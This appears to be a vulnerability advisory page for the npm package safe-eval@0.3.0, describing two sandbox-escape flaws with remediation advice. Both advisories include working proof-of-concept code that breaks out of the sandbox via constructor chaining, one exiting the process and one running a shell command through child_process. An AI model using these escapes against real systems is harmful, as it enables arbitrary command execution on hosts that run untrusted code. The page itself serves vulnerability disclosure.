safe-eval@0.3.0

Vulnerabilities

2 via 2 paths

Dependencies

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
  • 1
Status
  • 2
  • 0
  • 0

critical severity

Sandbox Escaping

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.3.0

Detailed paths

  • Introduced through: safe-eval@0.3.0
    Remediation: Upgrade to safe-eval@0.4.0.

Overview

[safe-eval] is a version of eval, claiming to be safer.

Affected versions of this package are vulnerable to Sandbox Escaping. User input is not sanitized before being passed on to the safeEval function. A malicious user could access the object constructors, allowing access to the standard library, then escaping the sandbox.

Proof of Concept:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

Remediation

Upgrade safe-eval to version 0.4.0 or higher.

References

high severity

Sandbox Escape

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.3.0

Detailed paths

  • Introduced through: safe-eval@0.3.0

Overview

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Remediation

There is no fixed version for safe-eval.

References